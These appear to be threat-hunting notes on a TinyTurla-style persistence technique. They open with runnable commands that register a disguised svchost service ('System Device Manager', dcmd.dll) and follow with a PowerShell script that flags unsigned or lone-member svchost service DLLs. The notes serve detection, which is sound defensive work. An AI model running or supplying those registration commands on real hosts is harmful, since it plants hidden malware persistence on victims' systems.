reg add "HKLM\SYSTEM\CurrentControlSet\services\sdm\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\dcmd.dll" /f
sc create sdm binPath= "c:\windows\system32\svchost.exe -k sysman" type= share start= auto
sc config sdm DisplayName= "System Device Manager"
sc description sdm "Creates and manages system-mode driver processes. This service cannot be stopped."
sc start sdm
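
Added hunting example, not part of the original notes: PowerShell that walks every svchost group in the registry, resolves each member service's ServiceDll and reports DLLs that are missing, unsigned or not Microsoft-signed, with the group's member count alongside. A registration like the one above (new group "sysman", one member, dcmd.dll) surfaces as Group=sysman, Members=1 plus a signature reason. It reads only HKLM and the files on disk, so it does not need elevation.

```powershell
# Added detection example: find svchost-hosted services whose ServiceDll does not check out.
# Not from the original notes. Reads HKLM directly; run in Windows PowerShell or pwsh on Windows.
function Get-SuspiciousSvchostServices {
    $svchostKey = Get-Item 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost'
    foreach ($group in $svchostKey.GetValueNames()) {
        if (-not $group) { continue }                         # skip the (Default) value
        $members = @($svchostKey.GetValue($group))            # REG_MULTI_SZ -> string[]
        foreach ($svc in $members) {
            $svcKey = "HKLM:\SYSTEM\CurrentControlSet\Services\$svc"
            if (-not (Test-Path -LiteralPath $svcKey)) { continue }
            $imagePath = (Get-ItemProperty -LiteralPath $svcKey -ErrorAction SilentlyContinue).ImagePath
            $dll = (Get-ItemProperty -LiteralPath "$svcKey\Parameters" -ErrorAction SilentlyContinue).ServiceDll
            if (-not $dll) { continue }                       # not a DLL service hosted by svchost
            $path = [Environment]::ExpandEnvironmentVariables($dll)   # %systemroot% etc. as in the reg add above
            $reasons = @()
            if (-not (Test-Path -LiteralPath $path)) {
                $reasons += 'ServiceDll missing on disk'
            } else {
                $sig = Get-AuthenticodeSignature -FilePath $path
                if ($sig.Status -ne 'Valid') {
                    $reasons += "signature $($sig.Status)"
                } elseif ($sig.SignerCertificate.Subject -notmatch 'O=Microsoft Corporation') {
                    $reasons += 'not Microsoft-signed'
                }
            }
            if ($reasons.Count -gt 0) {
                [pscustomobject]@{
                    Group      = $group
                    Members    = $members.Count   # a brand-new group with a single member is the TinyTurla tell
                    Service    = $svc
                    ImagePath  = $imagePath
                    ServiceDll = $path
                    Reasons    = ($reasons -join '; ')
                }
            }
        }
    }
}

Get-SuspiciousSvchostServices | Sort-Object Members | Format-Table -AutoSize
```

Get-AuthenticodeSignature validates catalog-signed Windows DLLs on current builds, but on hosts where catalog lookup fails many stock DLLs come back NotSigned, so treat the output as a triage list and pivot on Members, the group name and the DLL path before calling anything malicious.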